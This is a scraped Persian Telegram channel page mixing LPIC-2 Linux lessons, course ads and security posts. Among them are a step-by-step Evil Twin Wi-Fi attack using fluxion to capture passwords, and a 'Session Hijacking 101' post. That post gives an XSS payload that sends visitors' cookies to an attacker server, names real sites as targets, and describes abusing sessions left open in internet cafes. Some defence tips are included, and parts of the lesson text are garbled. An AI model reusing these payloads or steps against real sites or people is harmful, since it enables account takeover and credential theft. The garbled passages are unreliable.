وقتی میتونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بیحد و حصر.\n\nریاکشنها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفهایها):\n@Network_advanced\n\n#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking","datePublished":"2026-02-27T16:33:09Z","dateModified":"2026-02-27T16:33:28Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3653","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3653","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3653","headline":"LPIC‑2 | Lesson 1 از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی میشیم که درایورها و وقفه…","articleBody":"LPIC‑2 | Lesson 1\n\n از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی میشیم که درایورها و وقفههای سختافزاری (Interrupts) باید جلوی تو لنگ بندازن. اینجا LPIC-2 هست؛ جایی که ما لینوکس رو نمیرونیم، ما لینوکس رو کالبدشکافی میکنیم.\n\nاز درس ۱ شروع میکنیم، اما با غلظتی که مغزت بوی سیلیکون سوخته بده.\n\n---\n\n### درس ۱: پایش سیستم و پیشبینی ظرفیت (Capacity Planning) در سطح جانی!\n\nیک ادمین معمولی وقتی سرور کند میشه top میزنه و نگاه میکنه. یک مهندس LPIC-2 مثل تو، باید بتونه قبل از اینکه کاربر حتی بفهمه سرور قراره کند بشه، گلوگاه (Bottleneck) رو پیدا و خفه کنه.\n\n#### **۱. کالبدشکافی با sar (System Activity Reporter):**\nابزار sar عصای دست توئه. این ابزار دادهها رو از /proc میکشه و در فایلهای باینری در /var/log/sa/ ذخیره میکنه.\nتحلیل حافظه در گذشته:ه:** فرض کن دیشب ساعت ۳ صبح سرور کرش کرده. با این دستور برگرد به عقب:\n sar -r -f /var/log/sa/sa$(date +%d -d \"yesterday\")\n اینجا دنبال ستون %commit بگرد. اگه این عدد از ۱۰۰ بالاتر رفته، یعنی سیستم بیش از حدِ توانِ واقعیش (RAM + Swap) به پروسسها وعده فضا داده و دیشب \"OOM Killer\" اومده و پروسسها رو سلاخی کرده.\n\n#### **۲. شکارچی گلوگاه: vmstat و وقایع پشت پرده:**\nاجرای vmstat 1 فقط چند تا عدد نیست، ضربان قلب سیستمه.\n* **ستون cs (Context Switches):** اگه این عدد به طور ناگهانی بالا بره (مثلاً بالای ۱۰۰ هزار)، یعنی CPU داره دیوونه میشه چون مدام مجبور ه بین پروسسهای مختلف سوئیچ کنه و عملاً هیچ کار مفیدی انجام نمیده.\n* **ستون in (Interrupts):** بالا بودن این عدد یعنی یه قطعه سختافزاری (مثل کارت شبکه زیر حمله DDoS یا یه دیسک خراب) داره مدام به CPU سیگنال میفرسته و وقتش رو تل۳. شکنجه دیسک با iostat:یسک با iostat:**\nوقتی دیسک کند میشه، سیستم فلج میشه. این دستور رو بزن: iostat -xz 1.\n* **ستون await:** این حیاتیترین عدده. یعنی میانگین زمانی (به میلیثانیه) که یک درخواست I/O منتظر میمونه تا انجام بشه. اگه این عدد بالای ۱۰-۱۵ میلیثانیه بره، دیسکهای تو داستون %util:\n* **ستون %util:** اگه این ۱۰۰٪ باشه یعنی دیسک بندری میزنه و دیگه هیچ پهنای باندی نداری. وقتشه RAID رو ارتقا بدی یا ب۴. پیشبینی ظرفیت (The Engineering Art): Engineering Art):**\nمهندس واقعی با حدس و گمان کار Linear Regression*Linear Regression** استفاده کنی.\n* فایلهای sa رو به متن تبدیل کن: sadf -d /var/log/sa/saXX -- -r > mem_usage.csv.\n* این دادهها رو توی اکسل یا با یه اسکریپت پایتون تحلیل کن. اگه نرخ رشد مصرف RAM ماهانه ۵٪ باشه و تو الان ۲۰٪ فضای خالی داری، یعنی دقیقاً ۴ ماه دیگه سرورِ تو میترکه. این یعنی Capac۵. ابزارهای مدرنتر: ابزارهای مدرنتر:**\nیادت باشه collectd و Prometheus هم هستن، اما در امتحان LPIC-2 و در شرایطی که شبکه قطعه، تو فقط خودتی و sysstat. پس باید بتونی با sadc و sa1/sa2 دستی آمار جمع کنی.\n\nاگه فکر کردی ادمین بودن یعنی فقط نصب کردن پکیج، اشتباه کردی. ادمین لینوکس یعنی جراحِ ثانیهها و بایتها. وقتی بقیه دارن تو تاریکی دنبال مشکل میگردن، تو با تحلیل sar نور میتابونی به قلب سیستم.\nریاکشن رو بترکون تا بریم سراغ درس ۲ که قراره هسته لینوکس رو تیکه پاره کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفهایها):\n@Network_advanced\n\n#LPIC2 #SysAdmin #PerformanceTuning #CapacityPlanning #LinuxEngineering #Monitoring #HardcoreLinux","datePublished":"2026-02-26T18:40:02Z","dateModified":"2026-02-26T18:40:02Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":131},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6}]}}]}
Посты канала
Repost from N/a
شروع ثبت نام دوره پایتون از شنبه اغاز میشه
پیش نیاز اشنایی اولیه با الگوریتم فلوچارت هست اگه بلد نیستید اول اون دوره رو که قیمتش ناچیزه شرکت کنید و بعد اون پایتون
قیمت دوره پایتون مقدماتی ۶۰۰ تومن هست و حالت قسط بندی هم داریم
جهت ثبت نام پیوی تشریف بیارید
@P_00_15
| 2 | قیمت دوره هک و امنیت 450 بعلاوه 300 هست
یعنی با قیمت ۴۵۰ شروع میکنیم و خب اگر دانشجویان جنبشو داشته باشن ۳۰۰ دیگه پرداخت میکنید که وارد فاز تست نفوذ بشیم
این دوره ۷۰ درصد تئوری و ۳۰ درصد عملیه اما خب اگه جنبشو داشتید ۴۰ درصد تئوری و ۶۰ درصد عملی
سر فصل ها رو موقع ثبت نام بهتون میگم
جهت ثبت نام پیام بدین:
@P_00_15 | 248 |
| 3 | درود دوستان دوره الگوریتم و فلوچارت و دوره ورود به برنامه نویسی با زبان c++ توسط خودم همراه با پشتیبانی کامل ثبت نامش اغاز شده با توجه به پایدار نبودن اینترنت اکثریت امکان وصل شدنو نداشتن ترجیحمون اینه با توجه به قانونی بودن این دو دوره در پلتفرم های داخلی برگزارشون کنیم
در روبیکا به این ایدی پیام بدین
https://rubika.ir/ComputerScientist | 175 |
| 4 | لینک کانال های ما در روبیکا(نپرسید چرا اونجا فعالیت کردم تحت فشار و اجبارم...)
کانال کوییز:
https://rubika.ir/Techno_Quiz
کانال اصلی:
https://rubika.ir/TechnoTech
کانال تکنو پک:
https://rubika.ir/Techno_pack
کانال برنامه نویسی:
https://rubika.ir/Programming_society
کانال شبکه:
https://rubika.ir/Network_Society
هوش مصنوعی:
https://rubika.ir/AI_Community
جزوه و کتاب:
https://rubika.ir/Library_pack | 204 |
| 5 | امکان ذخیره پست ها همینک برای تمام کانال ها باز شد❤️ | 214 |
| 6 | اعلام وضعیت کنید | 219 |
| 7 | درود دوستان روز بخیر و عیدتون مبارک
مدتی که اینترنت در حالت ملی بود ناچار بودیم در پلتفرم های داخلی فعالیت کنیم... صرفا به دلیل اینترنت نیست کاربرای زیادی وجود دارن که در اونجا فعالیت دارن واسه اینکه مجموعمون بزرگتر شه و همه بشناسنمون در اونجا هم فعالیت هایی رو شروع کردیم...
و حالا که اینترنت به حالت اولیش برگشته هم در اینجا و هم در اونجا فعالیت رو ادامه خواهیم داد البته پست های اینجا با اونجا فرق داره بودن در پلتفرم های داخلی اختیاریه اما اگه هستید میتونم لینک بدم جوین شید
دقت کنید من همیشه جایی هستم که اکثر کاربرا قرار دارن... بودن من در اینجا زمانی که کمتر کاربر انلاینی وجود داشت بی نتیجه بود... واسه صاحب رسانه هایی مثل من دیده شدن اولویته حالا هر جا | 217 |
| 8 | تا وقتی همه نتونن به اینترنت دسترسی داشته باشن فعالیت نمیکنیم... | 249 |
| 9 | کافیه به اندازه کافی اینجا پست گذاشتم هر موقع ریکشن ها به اندازه کافی بیشتر شد ادامش میدم
حمایت کنید... | 29 |
| 10 | ریکشن بزارید ادامش بدیم | 25 |
| 11 | 💀 Evil Twin Attack
(وقتی وایفای آشنا یه دامه!)
تا حالا رفتی کافینت، وایفای رو نگاه کردی دیدی دو تا "کافه_نت" هست؟ یه مال واقعیه، یه مال منه! این میشه Evil Twin. برادر دوقلوی شیطون!
---
🧠 ماجرا چیه؟
من یه access point میذارم با اسم وایفای خودت. مثل:
· "کافهنت"
· "هتل_پارسیان"
· "مهمان_رایگان"
تو وصل میشی به من. منم:
· همه ترافیکتو میبینم
· پسوردهایی که میدی رو ذخیره میکنم
· تو رو میبرم به سایتای جعلی
· بدافزار میندازم تو گوشی و لپتاپت
---
🛠 ابزارای اجرا:
ابزار کاربرد سطح
airbase-ng ساخت AP جعلی متوسط
fluxion Evil Twin + captive portal حرفهای
wifiphisher فیشینگ وایفای حرفهای
mana toolkit ابزار کامل حرفهای
---
🔥 روش اجرا با fluxion (ساده ولی ترسناک):
git clone https://github.com/FluxionNetwork/fluxion
cd fluxion
./fluxion.sh
بعد:
1. انتخاب کن کارت شبکهات رو
2. انتخاب کن شبکه هدف رو (مثلاً "کافه_نت")
3. صبر کن تا دوقلوش ساخته بشه
4. به شبکه واقعی حمله کن تا همه کات شن
5. مردم خودشون میان به دوقلوی تو وصل میشن
6. صفحه جعلی پسورد براشون میاری، پسورد واقعی وایفای رو میدن!
---
🛡️ چطور بفهمیم گیر نیفتادیم؟
روش اول: چک کردن MAC address
تو گوشی یا لپتاپ ببین MAC آدرس access point چیه. دو تا AP با اسم یکسان ولی MAC متفاوت؟ یعنی یکی دوقلوی شیطونه!
روش دوم: ابزار WiFi Guardian
اپلیکیشنایی هستن که شبکههای جعلی رو شناسایی میکنن.
روش سوم: از VPN استفاده کن
حتماً VPN! حتی اگه به AP منم وصل شی، ترافیکت رمز میشه.
---
🛡️ چطور از خودمون محافظت کنیم؟
برای کاربرا:
· همیشه از VPN استفاده کن، حتی تو خونه
· قبل از وصل شدن، از کافه یا هتل بپرس اسم دقیق وایفای چیه
· اگه دو تا اسم تکراری دیدی، به هیچکدوم وصل نشو
· روی گوشی "auto-connect" رو خاموش کن
برای ادمینا:
· از WPA2-Enterprise با 802.1X استفاده کن (هر کاربر یوزرنیم و پسورد خودشو داره)
· از certificate برای احراز هویت استفاده کن
· به مشتریهات آموزش بده به شبکههای تکراری اعتماد نکنن
---
#EvilTwin #WiFiHacking #Fluxion #Wifiphisher #WirelessSecurity #RogueAP #ManInTheMiddle #MITM #WiFiPhishing #CaptivePortal #NetworkSecurity #CyberSecurity #RedTeaming #PenTesting #EthicalHacking #WiFiAttack #KaliLinux #AircrackNg #VPN #WPA2Enterprise #8021X #هک_وای_فای #دوقلوی_شیطون #امنیت_وای_فای #کافی_نت #امنیت_شبکه #آموزش_هک
---
هزاران آموزش شبکه و امنیت
@Network_advanced
---
تا حالا به یه وایفای با اسم تکراری وصل شدی؟
میدونستی با fluxion میشه کل یه کافه رو به دام انداخت؟
اگه این پست به دردت خورد، ریکشن بزار. حمایت نکنی، میآم دوقلوت میسازم! 😂 | 106 |
| 12 | 🧨 Network Tarpitting
(کند کردن حمله با فریب؛ وقتی هکر تو باتلاق گیر میکنه!)
تا حالا فکر کردین به جای بستن در به روی هکر، بذاری بیاد تو ولی انقدر آهسته جواب بدی که دیگه کلافه بشه بره؟ به این میگن Tarpitting. یعنی حملهکننده رو تو یه باتلاق مجازی گیر میندازی!
---
🧠 ماجرا چیه؟
هکر عادت داره سریع نتیجه بگیره. پورت اسکن میکنه، باید جواب سریع بگیره. حمله پسورد میکنه، باید زود جواب ببینه. حالا تو میآی پورت رو باز میذاری ولی:
· به هر درخواست با تأخیر ۱۰ ثانیه جواب میدی
· نصفه جواب میدی
· گاهی اشتباه جواب میدی
· تازه باهاش بازی میکنی!
---
🛠 انواع Tarpit:
۱. TCP Tarpit:
یه پورت باز میذاری. هکر وصل میشه. سرور جواب میده "دیتا بگیر". هکر میگه "بفرست". تو میگی "صبر کن"... همین! تا ابد منتظر میمونه!
ابزار: LaBrea معروفترین تارپیت دنیا.
۲. HTTP Tarpit:
به یه وب سرور جعلی وصل میشه. یه عالمه کوکی براش میفرستی، صفحه رو قطعه قطعه میدی، جاوااسکریپت بینهایت لود میکنه. مرورگر هکر کرش میکنه!
۳. SSH Tarpit:
یه سرور SSH جعلی میذاری. هکر با هزار تا پسورد سعی میکنه. تو هر بار میگی "پسورد غلطه" ولی با تأخیر ۵ ثانیه. بعد از ۱۰۰۰ بار امتحان، دیگه پیر شده!
۴. SMTP Tarpit (مخصوص هرزنامه):
هرزنامهفرست وصل میشه به میل سرورت. تو آهسته آهسته جواب میدی. اونم معطل میمونه تا تایم اوت بخوره. نتیجه: ربات اسپمر از کار میافته.
---
📊 ابزارای معروف:
ابزار نوع کاربرد
LaBrea TCP Tarpit گیر انداختن اسکنرها
Endlessh SSH Tarpit کلافه کردن هکرای SSH
SlowLoris HTTP Slow Attack حمله کند به سرور (سمت هکر!)
Tarpit.py Python تارپیت ساده و شخصیسازی
---
🛡️ نصب و اجرای Endlessh (SSH Tarpit):
sudo apt install endlessh
sudo systemctl start endlessh
حالا پورت ۲۲ رو میذاری برای Endlessh، پورت اصلی SSH رو میبری یه جای دیگه. هر کی بخواد پسورد بزنه، میافته تو تله!
---
🔥 سناریوی واقعی:
یه شرکت رو در نظر بگیر. روزی ۱۰۰۰ تا اسکن از چین و روسیه میاد. همه میخوان پسورد SSH رو پیدا کنن. مدیر شبکه میآد:
· SSH اصلی رو میبره پورت ۲۲۲۲
· پورت ۲۲ رو میده به Endlessh
· حالا هر کی به پورت ۲۲ وصل بشه، میافته تو باتلاق
نتیجه: رباتهای هکر تا ۱۰ دقیقه معطل میشن تا قطع شن. دیگه کسی نمیاد سراغ این شرکت!
---
📌 جمعبندی:
· تارپیت = گیر انداختن هکر در باتلاق کندی
· LaBrea برای TCP، Endlessh برای SSH
· هکرا از کندی متنفرن، باهاشون بازی کن
· به جای بستن در، بذار تو باتلاق گیر کنن
---
#NetworkTarpitting #Tarpit #LaBrea #Endlessh #SSHTarpit #HTTPTarpit #SMTPTarpit #Honeypot #CyberDeception #NetworkSecurity #SlowLoris #DDoS #PenTesting #RedTeam #BlueTeam #CyberDefense #ThreatHunting #IntrusionDetection #SSHSecurity #PortHoneypot #باتلاق_شبکه #تارپیت #سراب_شبکه #فریب_هکر #امنیت_شبکه #آموزش_امنیت #دفاع_شبکه
---
هزاران آموزش شبکه و امنیت
@Network_advanced
---
تا حالا هکر رو تو باتلاق انداختی؟
به نظرت تارپیت بهتره یا بستن کامل پورت؟
اگه این پست به دردت خورد، ریکشن بزار. حمایت نکنی، میآم SSH رو تارپیت میکنم تا پیر شی! 😂 | 85 |
| 13 | 🔥 AI-Powered Network Attacks (حملات شبکه با هوش مصنوعی
وقتی هکر دیگه آدم نیست!)
تا حالا فکر کردین اگه هکر بات باشه چی؟ نه بات ساده واسه DDoS، یه هوش مصنوعی که خودش تصمیم میگیره، خودش نقص پیدا میکنه، خودش حمله میکنه. این دیگه ترسناکه!
---
🧠 ماجرا چیه؟
هوش مصنوعی تا دیروز تو دست ما بود برای دفاع. از امسال، تو دست هکرا هم هست برای حمله . دیگه یه هکر نشسته پشت سیستم نیست که دستور بده. AI میآد:
· شبکه رو اسکن میکنه
· آسیبپذیری پیدا میکنه
· اکسپلویت مینویسه
· اجرا میکنه
· و حتی خودش رو پنهان میکنه
همه اینا توی چند ثانیه، بدون دخالت انسان .
---
🛠 انواع حملات با هوش مصنوعی:
۱. Autonomous Attack Agents:
یه AI که بهش میدی "برو تو شبکه فلان شرکت رو بزن". خودش:
· پورتاسکن میکنه
· سرویسها رو شناسایی میکنه
· آسیبپذیریهای روز رو چک میکنه
· اکسپلویت مناسب رو انتخاب میکنه
· نفوذ میکنه
· ردپا پاک میکنه
۲. AI-Powered Phishing:
دیگه ایمیلای احمقانه "من شاهزاده نیجریهام" تموم شد. AI میآد:
· شبکههای اجتماعی قربانی رو میخونه
· سبک نوشتنش رو یاد میگیره
· یه ایمیل مینویسه دقیقاً مثل همکارش
· لینک مخرب میذاره
· اگه کلیک نکرد، یه یادآوری دوستانه میفرسته!
۳. Deepfake Voice برای Vishing:
تماس میگیره با صدای مدیرعامل:
"علی جان، یه انتقال فوری داریم، ۵۰ میلیون بکن به این حساب، بعداً توضیح میدم."
۴. Automated Vulnerability Discovery:
AI میچرخه تو کدهای متنباز، باگ پیدا میکنه، اکسپلویت مینویسه. دیگه نیازی به تیم قرمز نیست!
---
📊 ابزارایی که الان هست:
ابزار/پروژه کاربرد سطح دسترسی
WormGPT ساخت ایمیل فیشینگ دارکوب
FraudGPT ابزارای هک با AI دارکوب
DeepLocker بدافزار هوشمند (IBM) تحقیقاتی
BlackMamba کیلاگر با AI POC
---
🛡️ چطور جلوش رو بگیریم؟ (کاری که خیلی سخته!)
۱. AI-Driven Defense:
باید با AI جلوی AI رو بگیری . سیستمهای دفاعی که خودشون AI دارن:
· رفتار غیرعادی رو سریع تشخیص میدن
· ترافیک رمزنگاریشده رو تحلیل میکنن (بدون باز کردن!)
· به حملات سریع جواب میدن
۲. Behavioral Analysis:
دیگه امضا (Signature) جواب نمیده. باید رفتار رو رصد کنی. یه کاربر یهو ۱۰۰۰ تا فایل کپی کرد؟ یعنی یه چیزی غلطه.
۳. Zero Trust واقعی:
همیشه چک کن، به هیچکس اعتماد نکن. حتی اگه با صدای مدیرعامل زنگ زد!
۴. آموزش کارمندا:
دیگه نمیشه گفت "روی لینک نزن". باید بهشون یاد بدی که حتی اگه مامانش ایمیل زد، شک کنه!
---
🔥 سناریوی ترسناک واقعی ۲۰۲۶:
یه شرکت بزرگ رو در نظر بگیر. هکرها یه AI آموزش میدن با:
· ایمیلای واقعی کارمندها
· مکالمات ضبطشده
· کدهای اختصاصی شرکت
بعد این AI:
۱. صبح ساعت ۸: یه ایمیل از "مدیر فنی" میاد: "فایل بهروزرسانی ضمیمه شده، نصب کنین."
۲. کارمند نصب میکنه
۳. بدافزار با AI داخلش تصمیم میگیره کی فعالیت کنه
۴. موقعی حمله میکنه که تیم امنیت ناهارن
۵. دیتا رو میکشه بیرون با ترافیک عادی HTTPS
۶. همه چی تموم!
---
📊 مقایسه حملات سنتی با AI:
ویژگی حملات سنتی حملات با AI
سرعت شناسایی متوسط سریع (adaptive)
شخصیسازی کم بالا
مقیاس محدود نامحدود
ردپا داره تقریباً صفر
نیاز به هکر داره میتونه نداشته باشه
---
#AIPoweredAttacks #AIinCybersecurity #WormGPT #FraudGPT #Deepfake #AIPhishing #AutonomousMalware #CyberAI #AIDrivenDefense #ZeroTrust #BehavioralAnalysis #MachineLearningSecurity #ThreatIntelligence #RedTeaming #AdversarialAI #PromptInjection #LLMSecurity #DarkWeb #CyberThreats2026 #هوش_مصنوعی_در_هک #حمله_با_AI #دیپفیک #فیشینگ_هوشمند #امنیت_شبکه #آموزش_هک #آموزش_امنیت
---
هزاران آموزش شبکه و امنیت
@Network_advanced
---
تا حالا فکر کردی ایمیلی که از رئیست اومده رو شاید یه AI نوشته باشه؟
میدونستی تو دارکوب میتوني WormGPT بخری با ۵۰ دلار؟
به نظرت چند سال دیگه هکرای انسان بیکار میشن؟
اگه این پست به دردت خورد، ریکشن بزن حمایت نکنی، میام یه AI میگیرم میندازم تو شبکت! 😂 | 64 |
| 14 | 🔥 بیا تا بهت یاد بدم چطور با یه کوکی ساده بری تو حساب مردم!
(Session Hijacking 101)
---
🍪 کوکی چیه؟ (اگه نمیدونی خجالت بکش)
وقتی میری تو اینستا یا تلگرام وب یا حتی دیوار و لاگین میکنی، یه چیزی به مرورگرت داده میشه به اسم کوکی. این کوکی مثل کارت شناسایی میمونه. هر بار میری اون سایت، مرورگر میگه "سلام، من همونم، یادت هست؟"
حالا اگه من این کوکی رو ازت بگیرم، میتونم برم تو حسابت. بدون اینکه پسوردتو بدونم. فقط با یه تیکه کد کوچولو.
---
روش اول: XSS یا همون "نظر بده کوکی ببر"
یه سایت پیدا کن که مردم بتونن نظر بدن. مثلاً یه سایت خبری ایرانی مثل دیجیاتو یا زومیت یا حتی یه وبلاگ شخصی. اگه اون سایت کصشر باشه و جلوی کد رو نگرفته باشه (که خیلی از سایتای ایرانی نمیگیرن)، من این کدو میذارم تو بخش نظرات:
<script>fetch('http://my-server.com/steal?cookie=' + document.cookie)</script>
حالا هر کی اون صفحه رو ببینه، بیخبر کوکیش میاد پیش من. بعد من با اون کوکی میرم تو سایت. تموم شد. تبریک میگم، من الان تویی!
---
روش دوم: ابزارایی که کارو واست راحت میکنن
شاید کدنویسی بلد نباشی، نگران نباش. یکی برات ابزار ساخته:
· EditThisCookie: یه افزونه کروم. میتونی کوکی رو ببینی، عوض کنی، هر کاری دوست داری بکنی
· Cookie-Editor: همون کارو میکنه فقط تمیزتر
· Wireshark: این دیگه حرفهایاس. اگه بلد باشی باهاش کار کنی، هیچی ازت قایم نمیشه
---
روش سوم: کافینت یادت نره
رفتی کافینت، یه نفر قبلاً اونجا بوده و حساب دیوارش یا روبیکا یا حتی ایمیل خودش رو باز کرده. بلند شده رفته ولی مرورگر رو نبسته. احمق بوده دیگه. تو میآی بشینی پای همون سیستم. مرورگر رو که باز میکنی، میبینی هنوز تو حساب اون آدمی!
حالا چکار میکنی؟
· میری پیامهاش رو میخونی
· آگهی میزاری به اسم خودش تو دیوار
· به دوستاش پیام میدی تو روبیکا
· اگه سایت اجازه بده، پسوردش رو عوض میکنی
همش با یه کوکی که مونده تو مرورگر. به خدا اینقدر ساده اس که گاهی خودم خندهم میگیره.
---
چطور جلوش رو بگیریم؟ (اگه نمیخوای بدبخت بشی)
اگه کاربری:
· مرورگر رو کامل ببند. فقط تب رو نبند
· از حالت ناشناس استفاده کن
· بعد کار حتماً Logout بزن
· به HTTPS سایتا دقت کن. اون قفل سبز یعنی امنه
اگه برنامهنویسی:
· کوکی رو HttpOnly کن
· Secure flag رو بذار
· Session رو زود منقضی کن
· ۲FA بذار برا سایتت
---
حرف آخر:
Session دزدی یعنی یکی میاد کوکی تو رو میگیره و میره تو حسابت. نه پسوردتو میخواد، نه ایمیلتو. فقط کافیه تو یه لحظه غافل باشی.
پس:
· Logout یادت نره
· مرورگرتو باز نذار
· ۲FA بزن
· تو کافینتا مراقب باش
---
#SessionHijacking #WebSecurity #XSS #هک #امنیت
هزاران آموزش شبکه و امنیت:
@Network_advanced | 63 |
| 15 | LPIC‑2 | Lesson 4
### درس ۴: معماری ذخیرهسازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسکها!
اگه هنوز فکر میکنی پارتیشنبندی یعنی فقط fdisk و ساختن چندتا درایو خشک و خالی، همین الان مدرک لینوکست رو پاره کن! تو LPIC-2، ما دیسک رو به زنجیر میکشیم. ما یاد میگیریم چطور از ترکیب دیسکهای داغون، یه ابر-ذخیرهساز بسازیم که حتی با سوختن دیسک هم آخ نگه!
#### ۱. زنده کردن مردگان با Software RAID (ابزار mdadm):
تو دنیای واقعی، دیسکها میسوزن. این یه حقیقته. ولی یه مهندس لینوکس طوری سیستم رو میچینه که دیتاسنتر آتیش بگیره ولی دیتا نپره!
* RAID 0 (سرعت مرگبار): دیتا رو تیکه تیکه میکنه روی دیسکها. سرعت عالی، ولی اگه یه دیسک بسوزه، فاتحه کل دیتا خوندهست. (فقط برای کش و تمپ!)
* RAID 1 (آینه): هر چی تو این بنویسی، تو اون یکی هم کپی میشه. امنیت ۱۰۰٪، ولی نصف ظرفیتت میپره.
* RAID 5 & 6 (تعادل قدرت): استفاده از Parity. تو RAID 5 یک دیسک و تو RAID 6 دو دیسک همزمان بسوزن، سیستم عین ساعت کار میکنه.
* فرمان عملیاتی: mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1
* مانیتورینگ وضعیت: همیشه چشمت به /proc/mdstat باشه. اگه دیدی نوشته [U_U], یعنی یکی از دیسکهات مرخص شده و باید سریع جایگزینش کنی!
#### ۲. انعطاف مطلق با LVM (Logical Volume Manager):
LVM یعنی آزادی! یعنی وقتی پارتیشن /var پر شد، لازم نیست سرور رو خاموش کنی یا پارتیشن رو دیلیت کنی.
* سلسله مراتب قدرت:
1. PV (Physical Volume): تبدیل پارتیشنهای خام به خمیر بازی لینوکس! (pvcreate /dev/sdb1)
2. VG (Volume Group): ریختن همه PVها تو یه ظرف بزرگ. انگار یه دیسک غولآسا داری. (vgcreate my_data /dev/sdb1 /dev/sdc1)
3. LV (Logical Volume): بریدن تکههای دلخواه از اون ظرف بزرگ. (lvcreate -L 100G -n web_data my_data)
* افزایش حجم در حال پرواز (On-the-fly):
lvextend -L +50G /dev/my_data/web_data -r
اون سوئیچ -r معجزهست! همزمان هم حجم رو زیاد میکنه، هم فایلسیستم رو (بدون Unmount کردن!).
#### ۳. سفر در زمان با LVM Snapshots:
این یکی از خطرناکترین و جذابترین ویژگیهای LVM هست. میخوای آپدیت سنگین بزنی و میترسی سیستم بترکه؟ یه Snapshot بگیر!
lvcreate -s -n backup_before_update -L 5G /dev/my_data/web_data
حالا یه "تصویر" از لحظه حال داری. اگه گند زدی، میتونی برگردی به عقب (Rollback). این یعنی بیمهی عمر دیتای تو!
#### ۴. عیبیابی و جراحی دیسکهای خراب:
وقتی یه دیسک تو RAID میسوزه، نباید دست و پات رو گم کنی.
1. دیسک خراب رو Fail کن: mdadm /dev/md0 --fail /dev/sdb1
2. دیسک رو خارج کن: mdadm /dev/md0 --remove /dev/sdb1
3. دیسک جدید رو بنداز و اضافه کن: mdadm /dev/md0 --add /dev/sde1
حالا بشین و تماشا کن که چطور سیستم خودش رو بازسازی (Rebuild) میکنه.
مهندسی دیسک یعنی تو هیچوقت غافلگیر نمیشی. تو همیشه یه نقشه جایگزین داری. تو به دیسکها دستور میدی، نه اونا به تو! قدرت مدیریت ذخیرهسازی، قلب تپنده هر دیتاسنتره.
ریاکشنها رو بترکونید که درس ۵ قراره بریم سراغ اعماق شبکه و فایروالهای پیشرفته!
هزاران آموزش شبکه و امنیت (مخصوص کسانی که دیسکها رو به زانو درمیآورند):
@Network_advanced
#LPIC2 #LVM #RAID #Mdadm #StorageArchitecture #SysAdmin #AdvancedLinux #DiskManagement #Snapshot #DataRecovery | 87 |
| 16 | LPIC‑2 | Lesson 3
### درس ۳: احیای سیستم و عیبیابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده از گور!
وقتی سرور اصلی دیتاسنتر بالا نمیاد، وقتی همه از ناامیدی سرشون رو میگیرن، اونجاست که تو، یک مهندس LPIC-2، وارد میدون میشی. اینجا دیگه خبری از reboot نیست؛ اینجا بحث بازگشت به زندگی در شرایط بحرانیه.
#### ۱. ورود به دنیای GRUB2 Shell (غار اسرارآمیز بوت):
اگه فایل grub.cfg خراب بشه، سیستم دیگه هیچی نمیفهمه. باید مثل یه هکر حرفهای، بری تو GRUB Shell.
* وقتی گراب بالا میاد، کلید c رو بزن. وارد محیط grub> میشی.
* پیدا کردن بوت لودر: اول باید بدونی کرنل و initrd کجا هستن:
grub> ls (لیست کردن دیسکها و پارتیشنها)
grub> ls (hd0,1)/boot/ (شاید اینجا باشه!)
* بوت دستی (Manual Boot): حالا که فهمیدی کرنل و initrd کجا پنهان شدن، دستی سیستم رو بوت کن:
grub> set root=(hd0,1) (پارتیشن روت رو مشخص کن)
grub> linux /boot/vmlinuz-$(uname -r) root=/dev/sda1 ro (آدرس کرنل و روت واقعی سیستم رو بده، ro یعنی Read-Only)
grub> initrd /boot/initramfs-$(uname -r).img (آدرس initramfs رو بده)
grub> boot (اگه همه چی درست بود، سیستم بالا میاد!)
فاجعه: اگه بعد از بوت، سیستم بالا اومد و فهمیدی اشتباه کردی، قبل از اینکه بره تو حالت Read-Only، سریع rw (Read-Write) کن و گراب رو ترمیم کن.
#### **۲. گریز از سیستمعامل با rd.break و systemd.unit=rescue.target:**
دور زدن پسورد روت:ت:** فرض کن پسورد روت رو فراموش کردی، یا یکی خرابکاری کرده و پسورد رو عوض کرده. ریبوت کن، تو گراب خط linux رو پیدا کن، آخرش rd.break رو اضافه کن.
... ro crashkernel=auto rd.break
حالا تو محیط initramfs هستی. اینجا روت (/) سیستم عامل شما نیست، بلکه یه محیط موقته.
mount -o remount,rw /sysroot (فایلسیستم اصلی رو برای نوشتن مانت کن)
chroot /sysroot (وارد محیط سیستم عامل اصلی شو)
passwd root (پسورد روت رو عوض کن!)
